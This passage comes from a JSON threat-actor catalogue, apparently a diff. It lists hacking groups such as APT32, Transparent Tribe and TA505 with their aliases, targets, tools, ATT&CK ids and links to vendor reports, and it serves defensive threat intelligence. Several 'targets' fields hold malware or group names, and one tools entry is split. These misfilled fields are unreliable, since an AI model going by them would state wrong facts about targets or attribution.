Backdoor", + "tools": [], + "links": [ + "https://www.securityartwork.es/2019/01/25/wirte-group-attacking-the-middle-east/", + "https://www.securityartwork.es/2019/01/18/grupo-wirte-atacando-a-oriente-medio/", + "https://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html", + " https://twitter.com/ItsReallyNick/status/1033413803470467072", + "https://lab52.io/blog/wirte-group-attacking-the-middle-east/", + " https://twitter.com/ClearskySec/status/1085160222233112577", + "https://twitter.com/jeFF0Falltrades/status/1085247772582912003", + "https://securelist.com/wirtes-campaign-in-the-middle-east-living-off-the-land-since-at-least-2019/105044/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "middle_east", + "names": [ + "Saber Lion", + "APT-C-38", + "ZooPark" + ], + "targets": [ + "Egypt, Jordan, Morocco, Lebanon, Iran, Iraqi Kurdistan" + ], + "operations": [], + "description": "Android malware, Windows malware", + "tools": [], + "links": [ + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/24122414/ZooPark_for_public_final_edited.pdf", + "http://blogs.360.cn/post/analysis-of-APT-C-38.html" + ], + "attck_id": null, + "comment": null + }, + { + "country": "middle_east", + "names": [ + "Racquet Bear", + "Pat Bear", + "APT-C-37" + ], + "targets": [ + "DroidJack, SpyNote, SSLove, NJRAT, H-Worm" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Unknown/APT-C-37/26-08-19/APT-C-37%20analysis.md", + "http://blogs.360.cn/post/analysis-of-apt-c-37.html", + "https://cybersecurity.att.com/blogs/labs-research/alien-labs-2019-analysis-of-threat-groups-molerats-and-apt-c-37" + ], + "attck_id": null, + "comment": null + }, + { + "country": "other", + "names": [ + "Corsair Jackal" + ], + "targets": [ + "Tunesia" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + 
"https://www.crowdstrike.com/blog/regional-conflict-and-cyber-blowback/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "other", + "names": [ + "The Mask", + "Careto" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://securelist.com/blog/research/58254/the-caretomask-apt-frequently-asked-questions/" + ], + "attck_id": null, + "comment": "Spanish Speaking Country" + }, + { + "country": "other", + "names": [ + "El Machete", + "Machete", + "Ragua" + ], + "targets": [ + "This threat actor targets military, government entities, and telecommunications providers, primarily in Latin America, for the purpose of espionage." + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://blog.360totalsecurity.com/en/apt-c-43-steals-venezuelan-military-secrets-to-provide-intelligence-support-for-the-reactionaries-hpreact-campaign/", + "https://research.checkpoint.com/2022/state-sponsored-attack-groups-capitalise-on-russia-ukraine-war-for-cyber-espionage/", + "https://www.cylance.com/en_us/blog/el-machete-malware-attacks-cut-through-latam.html", + "https://www.welivesecurity.com/2019/08/05/sharpening-machete-cyberespionage/", + "https://securelist.com/blog/research/66108/el-machete/" + ], + "attck_id": "G0095 ", + "comment": null + }, + { + "country": "other", + "names": [ + "Dropping Elephant", + "Chinastrats", + "APT-C-09", + "Viceroy Tiger", + "Capricorn Organisation ", + "Neon, Confucius", + "Patchwork", + "Mahaboo" + ], + "targets": [ + "global, including targets in the US, Europe, and the Middle East, many of the target countries are in the area surrounding the Indian subcontinent" + ], + "operations": [ + "Hangover", + "Monsoon" + ], + "description": null, + "tools": [ + "BADNEWS", + "AutoIt backdoor", + "Unknown Logger Public", + "TINYTYPHON" + ], + "links": [ + "https://ti.qianxin.com/blog/articles/coronavirus-analysis-of-global-outbreak-related-cyber-attacks/", + 
"http://www.sohu.com/a/211497788_764248", + "https://securelist.com/the-dropping-elephant-actor/75328/", + "https://www.cymmetria.com/patchwork-targeted-attack/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/confucius-update-new-tools-and-techniques-further-connections-with-patchwork/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/the-urpage-connection-to-bahamut-confucius-and-patchwork/", + "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/", + "https://ti.360.net/blog/articles/analysis-of-apt-c-09-target-china/", + "https://mp.weixin.qq.com/s/AfGrEi-ViJxHEEDtSLvQSg", + "https://blogs.forcepoint.com/security-labs/monsoon-analysis-apt-campaign", + "https://blog.trendmicro.com/trendlabs-security-intelligence/deciphering-confucius-cyberespionage-operations/", + "http://normanshark.com/wp-content/uploads/2013/08/NS-Unveiling-an-Indian-Cyberattack-Infrastructure_FINAL_Web.pdf", + "http://blog.trendmicro.com/trendlabs-security-intelligence/untangling-the-patchwork-cyberespionage-group/" + ], + "attck_id": "G0040 ", + "comment": "Overlaps with BITTER (group) " + }, + { + "country": "other", + "names": [ + "Hellsing APT" + ], + "targets": [ + "Naikon" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.kaspersky.com/blog/deny-the-hellsing-apt-by-default/3851/", + "https://securelist.com/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back/69567/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "other", + "names": [ + "WildNeutron", + "Jripbot", + "Wild Neutron", + "Deceptikons", + "Morpho" + ], + "targets": [ + "Jiripbot, Hesperbot" + ], + "operations": [ + "Sphinx Moth" + ], + "description": null, + "tools": [], + "links": [ + "https://cyware.com/news/new-hacker-for-hire-threat-actor-unearthed-by-security-researchers-e59eba70/?web_view=true", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + 
"https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "other", + "names": [ + "Sykipot " + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.sans.org/reading-room/whitepapers/malicious/detailed-analysis-sykipot-smartcard-proxy-variant-33919" + ], + "attck_id": "S0018 ", + "comment": null + }, + { + "country": "other", + "names": [ + "DeadlyKiss", + "TwoForOne", + "Platinum" + ], + "targets": [ + "primarily targets governmental organizations, defense institutes, intelligence agencies, and telecommunication providers in South and Southeast Asia" + ], + "operations": [], + "description": null, + "tools": [ + "Hotpatching techniques", + "CVE-2015-2545" + ], + "links": [ + "https://blog.telsy.com/deadlykiss-malware/", + "https://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf", + "https://securelist.com/platinum-is-back/91135/", + "https://www.microsoft.com/security/blog/2017/06/07/platinum-continues-to-evolve-find-ways-to-maintain-invisibility/?source=mmpc" + ], + "attck_id": "G0068", + "comment": null + }, + { + "country": "other", + "names": [ + "Danti" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "other", + "names": [ + "SVCMONDR" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "other", + "names": [ + "Transparent Tribe", + "Mythic Leopard", 
+ "Temp.Lapis", + "APT36", + "Green Havildar", + "ProjectM", + "Copper Fieldstone" + ], + "targets": [ + "Government of India diplomatic and military" + ], + "operations": [ + "Operation C-Major" + ], + "description": null, + "tools": [ + "Crimson RAT" + ], + "links": [ + "https://unit42.paloaltonetworks.com/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe/", + "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf", + "https://www.trendmicro.com/en_us/research/22/a/investigating-apt36-or-earth-karkaddans-attack-chain-and-malware.html", + "https://www.crowdstrike.com/blog/adversary-of-the-month-for-may/", + "https://ti.qianxin.com/blog/articles/analysis-of-apt-attack-activities-in-neighboring-countries-and-regions/", + "https://www.fireeye.com/blog/threat-research/2016/06/apt_group_sends_spea.html", + "https://blog.talosintelligence.com/2022/02/whats-with-shared-vba-code.html", + "https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html", + "https://www.trendmicro.com/en_us/research/16/c/indian-military-personnel-targeted-by-information-theft-campaign.html", + "https://blog.malwarebytes.com/threat-analysis/2020/03/apt36-jumps-on-the-coronavirus-bandwagon-delivers-crimson-rat/", + "https://cybleinc.com/2021/04/30/transparent-tribe-operating-with-a-new-variant-of-crimson-rat/", + "https://lab52.io/blog/new-transparentribe-operation-targeting-india-with-weaponized-covid-19-lure-documents/", + "https://cybleinc.com/2020/10/12/transparent-tribe-apt-targets-indian-military/", + "https://blog.360totalsecurity.com/en/cyber-suspicious-cloud-behind-the-peace-treaty-transparent-tribe-reveals-cyber-attacks-in-afghanistan/", + "https://blog.talosintelligence.com/2022/03/transparent-tribe-new-campaign.html" + ], + "attck_id": "G0134", + "comment": "possible link to Gorgon Group" + }, + { + "country": "other", + "names": [ + "SectorF01", + "APT-C-00", + "CyberOne 
Security, CyberOne Technologies, H\u00c3\u00a0nh Tinh Company Limited, Planet and Diacauso", + "Ocean Lotus", + "SeaLotus ", + "APT32" + ], + "targets": [ + "This threat actor targets organizations of interest to the Vietnamese government for espionage purposes. Victims have included human rights organizations, research institutes and maritime construction firms in China, and media organizations. Heavily targeting the automotive sector since 2018. " + ], + "operations": [ + "Cobalt Kitty" + ], + "description": null, + "tools": [ + "SOUNDBITE", + "Denis", + "CobaltStrike", + "Unique suite & OTS", + "RotaJakiro", + "KerrDown", + "Microsoft ActiveMime file attachments" + ], + "links": [ + "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/", + "https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/", + "https://threatrecon.nshc.net/2019/07/25/growth-of-sectorf01-groups-cyber-espionage-activities/", + "https://www.microsoft.com/security/blog/2020/11/30/threat-actor-leverages-coin-miner-techniques-to-stay-under-the-radar-heres-how-to-spot-them/", + "https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html", + "https://unit42.paloaltonetworks.com/tracking-oceanlotus-new-downloader-kerrdown/", + "https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/", + "https://www.recordedfuture.com/apt32-malware-campaign/", + "https://about.fb.com/news/2020/12/taking-action-against-hackers-in-bangladesh-and-vietnam/", + "https://blog.netlab.360.com/rotajakiro_linux_version_of_oceanlotus/", + "https://threatvector.cylance.com/en_us/home/report-oceanlotus-apt-group-leveraging-steganography.html", + "https://www.brighttalk.com/webcast/10703/261205", + "https://www.cybereason.com/labs-operation-cobalt-kitty-a-large-scale-apt-in-asia-carried-out-by-the-oceanlotus-group/", + 
"https://blog.cystack.net/word-based-malware-attack/", + "https://community.rsa.com/community/products/netwitness/blog/2018/01/30/apt32-continues-asean-targeting", + "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", + "https://ti.qianxin.com/blog/articles/english-version-of-new-approaches-utilized-by-oceanLotus-to-target-vietnamese-environmentalist/", + "https://www.scmagazineuk.com/ocean-lotus-groupapt-32-identified-as-vietnamese-apt-group/article/663565/", + "https://blog.malwarebytes.com/threat-analysis/2019/04/funky-malware-format-found-in-ocean-lotus-sample/", + "https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/", + "https://s.tencent.com/research/report/471.html" + ], + "attck_id": "G0050", + "comment": null + }, + { + "country": "other", + "names": [ + "BlackOasis" + ], + "targets": [ + "Russia, Iraq, Afghanistan, Nigeria, Libya, Jordan, Tunisia, Saudi Arabia, Iran, Netherlands, Bahrain, United Kingdom and Angola" + ], + "operations": [], + "description": null, + "tools": [ + "CVE-2016-0984 \u00e2\u0080\u0093 June 2015", + "CVE-2017-11292 \u00e2\u0080\u0093 Oct 2017", + "CVE-2015-5119 \u00e2\u0080\u0093 June 2015", + "FinSpy Malware", + "CVE-2017-8759 \u00e2\u0080\u0093 Sept 2017", + "CVE-2016-4117 \u00e2\u0080\u0093 May 2016" + ], + "links": [ + "https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/" + ], + "attck_id": "G0063 ", + "comment": null + }, + { + "country": "other", + "names": [ + "NEODYMIUM" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/" + ], + "attck_id": "G0055", + "comment": null + }, + { + "country": "other", + "names": [ + "PROMETHIUM", + "APT-C-41", + "StrongPity" + ], + "targets": [], + "operations": [], + "description": null, 
+ "tools": [
+ "Trojanized: (WinRAR",
+ "SanDisk)",
+ "WinUtils",
+ "TrueCrypt",
+ "StrongPity (S0491)"
+ ],
+ "links": [
+ "https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html",
+ "https://www.welivesecurity.com/2017/12/08/strongpity-like-spyware-replaces-finfisher/",
+ "https://securelist.com/on-the-strongpity-waterhole-attacks-targeting-italian-and-belgian-encryption-users/76147/",
+ "https://cybleinc.com/2020/12/31/strongpity-apt-extends-global-reach-with-new-infrastructure/",
+ "https://threatvector.cylance.com/en_us/home/whack-a-mole-the-impact-of-threat-intelligence-on-adversaries.html",
+ "https://citizenlab.ca/2018/03/bad-traffic-sandvines-packetlogic-devices-deploy-government-spyware-turkey-syria/",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf",
+ "https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/",
+ "https://www.alienvault.com/blogs/labs-research/newly-identified-strongpity-operations"
+ ],
+ "attck_id": "G0056",
+ "comment": null
+ },
+ {
+ "country": "other",
+ "names": [
+ "Andromeda Spider"
+ ],
+ "targets": [],
+ "operations": [],
+ "description": null,
+ "tools": [],
+ "links": [
+ "https://www.rsaconference.com/writable/presentations/file_upload/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries_final.pdf"
+ ],
+ "attck_id": null,
+ "comment": null
+ },
+ {
+ "country": "other",
+ "names": [
+ "Bamboo Spider"
+ ],
+ "targets": [],
+ "operations": [],
+ "description": null,
+ "tools": [
+ "Developed Panda Zeus"
+ ],
+ "links": [
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2018GlobalThreatReport.pdf page 19"
+ ],
+ "attck_id": null,
+ "comment": null
+ },
+ {
+ "country": "other",
+ "names": [
+ "Boson Spider"
+ ],
+ "targets": [],
+ "operations": [],
+ "description": null,
+ "tools": [
+ "CoreBot"
+ ],
+ "links": [
+ 
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report_BosonSpider.pdf", + "https://www.sig-switzerland.ch/wp-content/uploads/2016/03/SIGS_SOC_Forum_Sep2017_CrowdStrike_On_the_Hunt_for_Pandas_Kittens_and_Bears.pdf see slide 15" + ], + "attck_id": null, + "comment": "Criminal" + }, + { + "country": "other", + "names": [ + "Cobalt Spider", + "Magecart Group 4" + ], + "targets": [ + "Point of Sale" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2018GlobalThreatReport.pdf", + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-september-cobalt-spider/", + "https://blog.malwarebytes.com/threat-analysis/2019/10/magecart-group-4:-a-link-with-cobalt-group/" + ], + "attck_id": null, + "comment": "Criminal, linked to Cobalt" + }, + { + "country": "other", + "names": [ + "Dextorous Spider" + ], + "targets": [ + "Retail" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.rsaconference.com/writable/presentations/file_upload/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries_final.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "other", + "names": [ + "Dungeon Spider" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-october-dungeon-spider/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2018GlobalThreatReport.pdf " + ], + "attck_id": null, + "comment": "Criminal" + }, + { + "country": "other", + "names": [ + "Grim Spider", + "TEMP.MixMaster" + ], + "targets": [], + "operations": [ + "Dataresolution.net (MSP for multiple US newpapers)", + "Onslow, North Carolina water" + ], + "description": null, + "tools": [ + "Trickbot", + "Ryuk" + ], + "links": [ + 
"https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/", + "https://blog.kryptoslogic.com/malware/2019/01/10/dprk-emotet.html", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/ryuk-ransomware-attack-rush-to-attribution-misses-the-point/", + "https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/ryuk-exploring-the-human-connection/", + "https://www.onwasa.com/DocumentCenter/View/3701/Scan-from-2018-10-15-08_08_13-A", + "https://krebsonsecurity.com/2019/01/cloud-hosting-provider-dataresolution-net-battling-christmas-eve-ransomware-attack/", + "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html" + ], + "attck_id": "G0102", + "comment": "Criminal / Currently refers to Ryuk deployments following TrickBot infections, Indeterminate overlap with Indrik Spider, Mummy Spider and Wizard Spider" + }, + { + "country": "other", + "names": [ + "Hound Spider" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.sig-switzerland.ch/wp-content/uploads/2016/03/SIGS_SOC_Forum_Sep2017_CrowdStrike_On_the_Hunt_for_Pandas_Kittens_and_Bears.pdf see slide 15" + ], + "attck_id": null, + "comment": "Criminal" + }, + { + "country": "other", + "names": [ + "Evil Corp", + "SectorJ04", + "Indrik Spider", + "GOLD TAHOE", + "TA505" + ], + "targets": [ + "Financial institutions, Retail" + ], + "operations": [], + "description": null, + "tools": [ + "Remote Manipulator System", + "Dridex", + "FlawedAmmyy", + "WastedLocker", + "Cl0p" + ], + "links": [ + "https://www.proofpoint.com/us/threat-insight/post/ta505-targets-us-retail-industry-personalized-attachments", + "https://seguranca-informatica.pt/flawedammyy-leveraging-undetected-xlm-macros-as-an-infection-vehicle/", + 
"https://blog.yoroi.company/research/ta505-is-expanding-its-operations/", + "https://blog.truesec.com/2021/05/05/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies/", + "https://blog.yoroi.company/research/the-stealthy-email-stealer-in-the-ta505-arsenal/", + "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta505-dridex-globeimposter", + "https://threatrecon.nshc.net/2019/08/29/sectorj04-groups-increased-activity-in-2019/", + "https://www.proofpoint.com/us/threat-insight/post/ta505-abusing-settingcontent-ms-within-pdf-files-distribute-flawedammyy-rat", + "https://ti.360.net/blog/articles/excel-4.0-macro-utilized-by-ta505-to-target-financial-institutions-recently-en/", + "https://www.sig-switzerland.ch/wp-content/uploads/2016/03/SIGS_SOC_Forum_Sep2017_CrowdStrike_On_the_Hunt_for_Pandas_Kittens_and_Bears.pdf see slide 15", + "https://www.proofpoint.com/us/threat-insight/post/ta505-shifts-times", + "https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/latest-spam-campaigns-from-ta505-now-using-new-malware-tools-gelup-and-flowerpippi/", + "https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546", + "https://blog.prevailion.com/2020/01/ta-505-global-ransomware-criminals.html", + "https://www.proofpoint.com/us/threat-insight/post/ta505-begins-summer-campaigns-new-pet-malware-downloader-andromut-uae-south", + "https://blog.trendmicro.com/trendlabs-security-intelligence/shifting-tactics-breaking-down-ta505-groups-use-of-html-rats-and-other-techniques-in-latest-campaigns/", + "https://www.cybereason.com/blog/threat-actor-ta505-targets-financial-enterprises-using-lolbins-and-a-new-backdoor-malware", + "https://www.group-ib.com/media/silence_ta505_attacks_in_europe/", + 
"https://e.cyberint.com/hubfs/CyberInt_Cybercriminals%20go%20after%20USA%20retailers_Report.pdf", + "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505", + "https://blog.cyberint.com/threat-group-ta505-phishing-hijacks-remote-access-tools" + ], + "attck_id": "G0092", + "comment": "Criminal, cooperates with Lazarus group, Indeterminate overlap with Grim Spider, Mummy Spider and Wizard Spider" + }, + { + "country": "other", + "names": [ + "Lunar Spider" + ], + "targets": [ + "Financial Crime" + ], + "operations": [], + "description": null, + "tools": [ + "IcedID (BokBot)" + ], + "links": [ + "https://www.crowdstrike.com/blog/wizard-spider-lunar-spider-shared-proxy-module/", + "https://www.crowdstrike.com/blog/bokbots-man-in-the-browser-overview/" + ], + "attck_id": null, + "comment": "Cooperation with Wizard Spider" + }, + { + "country": "other", + "names": [ + "Magnetic Spider" + ], + "targets": [ + "Financial Crime" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "http://go.crowdstrike.com/rs/281-OBQ-266/images/ReportGlobalThreatIntelligence.pdf" + ], + "attck_id": null, + "comment": "Russia based \"financial-crime motivated actor\" - Crowdstike 2014 Global TIR pg 57" + }, + { + "country": "other", + "names": [ + "Mimic Spider" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.sig-switzerland.ch/wp-content/uploads/2016/03/SIGS_SOC_Forum_Sep2017_CrowdStrike_On_the_Hunt_for_Pandas_Kittens_and_Bears.pdf see slide 15" + ], + "attck_id": null, + "comment": "Criminal" + }, + { + "country": "other", + "names": [ + "Monty Spider" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2018GlobalThreatReport.pdf page 19" + ], + "attck_id": null, + "comment": "Criminal" + }, + { + "country": "other", + "names": [ + "Mummy Spider", + 
"Mealybug", + "TA542" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "Emotet " + ], + "links": [ + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-february-mummy-spider/", + "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta542-banker-malware-distribution-service", + "https://crowdstrike.lookbookhq.com/web-global-threat-report-2019/crowdstrike-2019-gtr", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2018GlobalThreatReport.pdf " + ], + "attck_id": null, + "comment": "Criminal, Indeterminate overlap with Grim Spider, Indrik Spider and Wizard Spider" + }, + { + "country": "other", + "names": [ + "Overlord Spider" + ], + "targets": [ + "Entertainment and healthcare sector" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2018GlobalThreatReport.pdf page 7" + ], + "attck_id": null, + "comment": "Criminal / Data Extortion" + }, + { + "country": "other", + "names": [ + "Pinchy Spider" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "GandCrab" + ], + "links": [ + "https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/" + ], + "attck_id": null, + "comment": "Criminal" + }, + { + "country": "other", + "names": [ + "Pizzo Spider" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.sig-switzerland.ch/wp-content/uploads/2016/03/SIGS_SOC_Forum_Sep2017_CrowdStrike_On_the_Hunt_for_Pandas_Kittens_and_Bears.pdf see slide 15" + ], + "attck_id": null, + "comment": "Criminal" + }, + { + "country": "other", + "names": [ + "Shark Spider" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.sig-switzerland.ch/wp-content/uploads/2016/03/SIGS_SOC_Forum_Sep2017_CrowdStrike_On_the_Hunt_for_Pandas_Kittens_and_Bears.pdf see slide 15" + ], + "attck_id": 
null, + "comment": "Criminal" + }, + { + "country": "other", + "names": [ + "Singing Spider" + ], + "targets": [ + "Commercial, Fiancial" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.rsaconference.com/writable/presentations/file_upload/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries_final.pdf" + ], + "attck_id": null, + "comment": "Criminal" + }, + { + "country": "other", + "names": [ + "FIN6", + "ITG08", + "Skeleton Spider", + "Magecart Group 6" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "Ransomware", + "Vawtrak/Neverquest", + "FrameworkPoS" + ], + "links": [ + "https://www.fireeye.com/blog/threat-research/2016/04/follow_the_money.html", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2018GlobalThreatReport.pdf ", + "https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/", + "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", + "https://www.proofpoint.com/us/search/site?search_text=TA530&language=en", + "https://exchange.xforce.ibmcloud.com/collection/FIN6-Financial-Crime-Actor-f55930eb9f4438efe9101a618d6a8703", + "https://webcache.googleusercontent.com/search?q=cache:wMkxJorBEKIJ:https://securityintelligence.com/x-force-iris-identifies-fin6-activity-on-pos-networks/+&cd=1&hl=en&ct=clnk&gl=uk&client=firefox-b", + "https://blog.trendmicro.com/trendlabs-security-intelligence/fin6-compromised-e-commerce-platform-via-magecart-to-inject-credit-card-skimmers-into-thousands-of-online-shops/" + ], + "attck_id": null, + "comment": "Criminal" + }, + { + "country": "other", + "names": [ + "Static Spider" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + 
"https://www.sig-switzerland.ch/wp-content/uploads/2016/03/SIGS_SOC_Forum_Sep2017_CrowdStrike_On_the_Hunt_for_Pandas_Kittens_and_Bears.pdf see slide 15" + ], + "attck_id": null, + "comment": "Criminal" + }, + { + "country": "other", + "names": [ + "Union Spider" + ], + "targets": [ + "Manufacturing" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.rsaconference.com/writable/presentations/file_upload/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries_final.pdf" + ], + "attck_id": null, + "comment": "Criminal" + }, + { + "country": "other", + "names": [ + "Wicked Spider" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-july-wicked-spider/", + "https://www.sig-switzerland.ch/wp-content/uploads/2016/03/SIGS_SOC_Forum_Sep2017_CrowdStrike_On_the_Hunt_for_Pandas_Kittens_and_Bears.pdf see slide 15" + ], + "attck_id": null, + "comment": "Criminal" + }, + { + "country": "other", + "names": [ + "ITG23", + "Wizard Spider" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "Ryuk", + "TrickBot" + ], + "links": [ + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2018GlobalThreatReport.pdf page 19", + "https://securityintelligence.com/posts/trickbot-gang-doubles-down-enterprise-infection/", + "https://www.crowdstrike.com/blog/wizard-spider-lunar-spider-shared-proxy-module/", + "https://www.prodaft.com/m/reports/WizardSpider_TLPWHITE_v.1.4.pdf", + "https://crowdstrike.lookbookhq.com/web-global-threat-report-2019/crowdstrike-2019-gtr page 52", + "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/", + "https://www.crowdstrike.com/blog/wizard-spider-adds-new-feature-to-ryuk-ransomware/" + ], + "attck_id": "G0102", + "comment": "Criminal, Indeterminate overlap with Grim Spider, Indirk Spider and Mummy Spider" + }, + { + "country": "other", + 
"names": [ + "Wold Spider" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.sig-switzerland.ch/wp-content/uploads/2016/03/SIGS_SOC_Forum_Sep2017_CrowdStrike_On_the_Hunt_for_Pandas_Kittens_and_Bears.pdf see slide 15" + ], + "attck_id": null, + "comment": "Criminal" + }, + { + "country": "other", + "names": [ + "Kelihos", + "Pytor Levashov ", + "Zombie Spider" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.crowdstrike.com/blog/inside-the-takedown-of-zombie-spider-and-the-kelihos-botnet/", + "https://www.sig-switzerland.ch/wp-content/uploads/2016/03/SIGS_SOC_Forum_Sep2017_CrowdStrike_On_the_Hunt_for_Pandas_Kittens_and_Bears.pdf see slide 15; https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2018GlobalThreatReport.pdf page 18" + ], + "attck_id": null, + "comment": "Criminal" + }, + { + "country": "other", + "names": [ + "Curious Jackal" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.sig-switzerland.ch/wp-content/uploads/2016/03/SIGS_SOC_Forum_Sep2017_CrowdStrike_On_the_Hunt_for_Pandas_Kittens_and_Bears.pdf see slide 15" + ], + "attck_id": null, + "comment": "Activist" + }, + { + "country": "other", + "names": [ + "Extreme Jackal" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.sig-switzerland.ch/wp-content/uploads/2016/03/SIGS_SOC_Forum_Sep2017_CrowdStrike_On_the_Hunt_for_Pandas_Kittens_and_Bears.pdf see slide 15" + ], + "attck_id": null, + "comment": "Activist" + }, + { + "country": "other", + "names": [ + "Gekko Jackal" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + 